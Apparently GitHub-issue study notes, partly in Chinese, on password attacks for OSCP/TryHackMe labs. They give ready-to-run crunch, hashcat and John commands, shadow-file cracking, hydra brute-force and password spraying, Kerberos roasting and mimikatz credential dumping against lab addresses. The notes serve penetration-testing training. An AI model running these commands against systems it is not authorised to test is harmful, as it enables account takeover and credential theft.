Open WDavid404 opened 8 months ago
crunch
is one of many powerful tools for creating an offline wordlist. With crunch, we can specify numerous options, including min, max, and options.
The following example creates a wordlist containing all possible combinations of 2 characters, including 0-4 and a-d. We can use the -o argument and specify a file to save the output to.
crunch 2 2 01234abcd -o crunch.txt
crunch also lets us specify a character set using the -t option to combine words of our choice. Here are some of the other options that could be used to help create different combinations of your choice:
@ - lower case alpha characters
, - upper case alpha characters
% - numeric characters
^ - special characters including space
For example, if part of the password is known to us, and we know it starts with pass and follows two numbers, we can use the % symbol from above to match the numbers. Here we generate a wordlist that contains pass followed by 2 numbers:
crunch 6 6 -t pass%%
git clone https://github.com/Mebus/cupp.git
python3 cupp.py ---> see the available options
python3 cupp.py -i --> interactive mode
python3 cupp.py -l --> download Pre-created wordlists
python3 cupp.py -a --> provide default usernames and passwords from the Alecto database
hashid or hash-identifier: to identify the type of hash https://www.kali.org/tools/hashid/
hashid '$2y$10$XrrpX8RD6IFvBwtzPuTlcOqJ8kO2px2xsh17f60GZsBKLeszsQTBC'
Note: 对于存在特殊字符,用单引号。 不能用双引号
In Bash and zsh, single quotes (') and double quotes (") have different meanings.
[Single quotes preserve the literal value of all characters within the quotes,
while double quotes allow for variable substitution, command substitution,
and interpretation of certain escape sequences ]
[For example, if you have a variable x=5, then echo '$x' will print $x, whereas echo "$x" will print 5 ]
hashcat' rule: https://hashcat.net/wiki/doku.php?id=rule_based_attack
kali@kali:~/passwordattacks$ echo "\$1 c" > demo.rule
kali@kali:~/passwordattacks$ cat demo1.rule
$1 c
kali@kali:~/passwordattacks$ hashcat -r demo1.rule --stdout demo.txt
Password1
Iloveyou1
Princess1
Rockyou1
Abc1231
kali@kali:~/passwordattacks$ cat demo2.rule
$1
c
kali@kali:~/passwordattacks$ hashcat -r demo2.rule --stdout demo.txt
password1
Password
iloveyou1
Iloveyou
princess1
Princess
...
kali@kali:~/passwordattacks$ cat demo1.rule
$1 c $!
kali@kali:~/passwordattacks$ hashcat -r demo1.rule --stdout demo.txt
Password1!
Iloveyou1!
Princess1!
Rockyou1!
Abc1231!
kali@kali:~/passwordattacks$ cat demo2.rule
$! $1 c
kali@kali:~/passwordattacks$ hashcat -r demo2.rule --stdout demo.txt
Password!1
Iloveyou!1
Princess!1
Rockyou!1
Abc123!1
kali@kali:~/passwordattacks$ cat crackme.txt
f621b6c9eab51a3e2f4e167fee4c6860
kali@kali:~/passwordattacks$ cat demo3.rule
$1 c $!
$2 c $!
$1 $2 $3 c $!
kali@kali:~/passwordattacks$ hashcat -m 0 crackme.txt /usr/share/wordlists/rockyou.txt -r demo3.rule --force
ls -la /usr/share/hashcat/rules/
hashcat -a 0 -m 0 f806fc5a2a0d5ba2471600758452799c /usr/share/wordlists/rockyou.txt
-a 0 sets the attack mode to a dictionary attack
-m 0 sets the hash mode for cracking MD5 hashes; for other types, run hashcat -h for a list of supported hashes.
f806fc5a2a0d5ba2471600758452799c this option could be a single hash like our example or a file that contains a hash or multiple hashes.
/usr/share/wordlists/rockyou.txt the wordlist/dictionary file for our attack
We run hashcat with --show option to show the cracked value if the hash has been cracked:
hashcat -a 0 -m 0 F806FC5A2A0D5BA2471600758452799C /usr/share/wordlists/rockyou.txt --show
hashcat -a 3 -m 0 05A5CF06982BA7892ED2A6D38FE832D6 ?d?d?d?d
05a5cf06982ba7892ed2a6d38fe832d6:2021
-a 3 sets the attacking mode as a brute-force attack
?d?d?d?d the ?d tells hashcat to use a digit. In our case, ?d?d?d?d for four digits starting with 0000 and ending at 9999
其他
--stdout print the result to the terminal
If you are using Kali, you can find it at /usr/share/wordlists/rockyou.txt. We will also have a crack.txt file with just the password hash.
edba955d0ea15fdef4f61726ef97e5af507430c0
then, run:
john --wordlist=/usr/share/wordlists/rockyou.txt --format=raw-md5 crack.txt
john --wordlist=/usr/share/wordlists/rockyou.txt --format=phpass crack.txt
Rule-Based attacks are also known as hybrid attacks. Rule-Based attacks assume the attacker knows something about the password policy.
Read /etc/john/john.conf and look for List.Rules to see all the available rules:
cat /etc/john/john.conf|grep "List.Rules:" | cut -d"." -f3 | cut -d":" -f2 | cut -d"]" -f1 | awk NF
Case: We will create a wordlist with only one password containing the string tryhackme by using rule
john --wordlist=/tmp/single-password-list.txt --rules=best64 --stdout | wc -l
john --wordlist=single-password-list.txt --rules=KoreLogic --stdout |grep "Tryh@ckm3"
We can add our rule to the end of john.conf:
user@machine$ sudo vi /etc/john/john.conf
[List.Rules:THM-Password-Attacks]
Az"[0-9]" ^[!@#$]
说明:
[List.Rules:THM-Password-Attacks] specify the rule name THM-Password-Attacks.
Az represents a single word from the original wordlist/dictionary using -p.
"[0-9]" append a single digit (from 0 to 9) to the end of the word. For two digits, we can add "[0-9][0-9]" and so on.
^[!@#$] add a special character at the beginning of each word. ^ means the beginning of the line/word. Note, changing ^ to $ will append the special characters to the end of the line/word.
Now let's create a file containing a single word password to see how we can expand our wordlist using this rule.
echo "password" > /tmp/single.lst
Use the customized rule
user@machine$ john --wordlist=/tmp/single.lst --rules=THM-Password-Attacks --stdout
Using default input encoding: UTF-8
!password0
@password0
#password0
$password0
输出为新的wordlist文件
john --wordlist=/tmp/single.lst --rules=THM-Password-Attacks --stdout > new_wordlist.lst
https://www.openwall.com/john/doc/FAQ.shtml
All of the password hashes found in the file (that are of the same type as the very first recognized hash in the file unless you're using the "--format=..." option) might be already cracked by previous invocations of John.
To display cracked passwords, use "john --show" on your password hash file(s).
john --show crack.txt
To force John to crack those same hashes again, remove the john.pot file.
┌──(kali㉿kali)-[~/Downloads]
└─$ cat passwd.txt
root:x:0:0:root:/root:/bin/bash
┌──(kali㉿kali)-[~/Downloads]
└─$ cat shadow.txt
root:$6$riekpK4m$uBdaAyK0j9WfMzvcSKYVfyEHGtBfnfpiVbYbzbVmfbneEbo0wSijW1GQussvJSk8X1M56kzgGj8f7DFN1h4dy1:18226:0:99999:7:::
└─$ unshadow passwd.txt shadow.txt > unshadowed.txt
┌──(kali㉿kali)-[~/Downloads]
└─$ cat unshadowed.txt
root:$6$riekpK4m$uBdaAyK0j9WfMzvcSKYVfyEHGtBfnfpiVbYbzbVmfbneEbo0wSijW1GQussvJSk8X1M56kzgGj8f7DFN1h4dy1:0:0:root:/root:/bin/bash
┌──(kali㉿kali)-[~/Downloads]
└─$ john --format=crypt --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
--->
if you meet an error msg as 'no password hashes loaded (see FAQ)' \
you can try to add '--format=crypt‘ :
john --format=crypt --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt
https://superuser.com/questions/1684358/john-the-ripper-on-kali-linux-it-outputs-no-password-hashes-loaded
remove .pot and .log files and then try again. rm .john/john.pot rm .john/john.log
Hydra supports an extensive list of network services to attack. Using hydra, we'll brute-force network services such as web login pages, FTP, SMTP, and SSH in this section.
//FTP
hydra -L userlist.txt -P passwordlist.txt 192.168.0.107 ftp -->非常耗时,不建议
hydra -l <ftpuser> -P passwordlist.txt 192.168.0.107 ftp
//SMTP
hydra -l email@company.xyz -P /path/to/wordlist.txt smtp://10.10.x.x -v
//SSH
hydra -L users.lst -P /path/to/wordlist.txt ssh://10.10.x.x -v
// OSCP example for SSH
hydra -l george -P /usr/share/wordlists/rockyou.txt -s 2222 ssh://192.168.50.201
## -s: port
## -l: LOGIN. login with LOGIN name.
// OSCP example for RDP
已知password但是不知道username的case:
hydra -L /usr/share/wordlists/dirb/others/names.txt -p "SuperS3cure1337#" rdp://192.168.50.202
//Login page
hydra -l admin -P 500-worst-passwords.txt 10.10.x.x http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:S=logout.php" -f
或者
hydra -l admin -P 500-worst-passwords.txt 10.10.x.x http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:S=logout.php" -t 32 -f -vV
(from OSCP)
hydra -l user -P /usr/share/wordlists/rockyou.txt 192.168.50.201 http-post-form "/index.php:fm_usr=user&fm_pwd=^PASS^:Login failed. Invalid"
Note:‘Login failed. Invalid’ 是login失败时在页面上显示的文言
(from OSCP) 对于如下图的Basic auth的网页
hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.250.201 http-get
hydra的命令里可以加上类似于 “-t 32” 的option让速度更快些
试着在网页里username和password文本框里随意输入,在网页URL里发现它会发GET query到“/login-get/index.php?
username=xxx&password=xxx”, 所以尝试使用hydra: hydra -l phillips -P clinic.lst 10.10.236.3 http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:S=logout.php" -f
Note⚠️: 如果Login的request是POST请求,则上面的命令要变成用 http-post-form
场景:知道密码(比如初始密码)和一组username For example, an attacker will use one password (say, Secure@123) against many different accounts on the application to avoid account lockouts that would normally occur when brute forcing a single account with many passwords.
hydra -L usernames-list.txt -p Spring2021 ssh://10.1.1.10
python3 RDPassSpray.py -u victim -p Spring2021! -t 10.100.10.240:3026
Historically, system administrators often changed local workstation passwords through Group Policy Preferences (GPP). However, even though GPP-stored passwords are encrypted with AES-256, the private key for the encryption has been posted on MSDN.We can use this key to decrypt these encrypted passwords. In this case, we'll use the gpp-decrypt ruby script in Kali Linux that decrypts a given GPP encrypted string:
kali@kali:~$ gpp-decrypt "+bsY0V3d4/KgX3VJdO/vyepPfAN1zMFTiQDApgR92JE"
P@$$w0rd
The Hashcat mode number for Atlassian (PBKDF2-HMAC-SHA1) hashes is 12001,
hashcat -m 12001 hashes.txt /usr/share/wordlists/fasttrack.txt
Do not require Kerberos preauthentication is enabled
impacket-GetNPUsers -dc-ip 192.168.50.70 -request -outputfile hashes.asreproast corp.com/pete
hashcat -m 18200 <hashfile> <Wordlists> -r <rule> --force
.\Rubeus.exe kerberoast /outfile:hashes.kerberoast
hashcat -m 13100 <hashfile> <Wordlists> -r <rule> --force
privilege::debug
sekurlsa::logonpasswords
lsadump::dcsync /user:<Domain\<TargetUsername>
hashcat -m 1000 <hashfile> <Wordlists> -r <rule> --force
Password Cracking vs. Password Guessing
Default Passwords
https://cirt.net/passwords https://default-password.info/ https://datarecovery.com/rd/default-passwords/
Weak Passwords
https://wiki.skullsecurity.org/index.php?title=Passwords - This includes the most well-known collections of passwords. SecLists - A huge collection of all kinds of lists, not only for password cracking.
Leaked Passwords
The following are some of the common password lists that have weak and leaked passwords, including webhost, elitehacker,hak5, Hotmail, PhpBB companies' leaks: SecLists/Passwords/Leaked-Databases
Combined wordlists
Customized Wordlists
Username Wordlists
username_generator: could help create a list with most of the possible combinations if we have a first name and last name.